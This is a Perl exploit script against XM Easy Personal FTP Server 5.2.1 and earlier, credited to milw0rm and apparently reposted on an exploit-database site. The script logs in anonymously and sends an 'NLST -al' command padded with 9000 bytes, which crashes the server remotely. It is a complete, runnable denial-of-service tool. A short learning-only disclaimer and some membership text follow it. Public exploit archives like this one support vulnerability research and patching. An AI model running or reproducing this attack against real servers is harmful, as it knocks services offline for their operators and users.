#!/usr/bin/perl # # * # * Title: XM Easy Personal FTP Server <= 5.2.1 'NLST -al' Remote Denial of Service # * Author: boecke # * Discovery: boecke # * Vulnerability Type: Remote Denial of Service # * Risk: Low Risk (Requires valid # * Software Affected: XM Easy Personal FTP Server <= 5.2.1 # * Greetings: henrik, str0ke! # * # use IO::Socket; $commandToSend = "NLST -al "; $remoteUsername = "anonymous"; $remotePassword = "borat\@kik.com"; $remotePort = $ARGV[1]; sub bannerExploit() { print "\n x XM Easy Personal FTP Server <= v5.2.1 Remote Denial of Service\n"; print " x Author: boecke\n x Discovery: boecke (boecke [at] herzeleid [dot] net)\n\n"; } if ( @ARGV < 2 ) { bannerExploit(); print " * Usage: perl ftp.pl 192.168.0.1 21\n\n"; exit; } if ($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $remotePort, Proto => "TCP" )) { bannerExploit(); print " + Establishing connection at " . $ARGV[0] . ":" . $remotePort . "\n"; print $socket "USER " . $remoteUsername . "\r\n"; print " * FTP Username: \'" . $remoteUsername . "\'\n"; sleep( 1 ); print $socket "PASS " . $remotePassword . "\r\n"; print " * FTP Password: \'" . $remotePassword . "\'\n"; print $socket $commandToSend . "A" x 9000 . "\r\n"; sleep( 3 ); print $socket "QUIT\r\n"; print " + Sent 9000 bytes of data to $ARGV[0]:$remotePort\n\n"; } else { bannerExploit(); print " + Failed to establish connection to " . $ARGV[0] . ":" . $remotePort . "\n"; } # milw0rm.com [2006-11-04]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论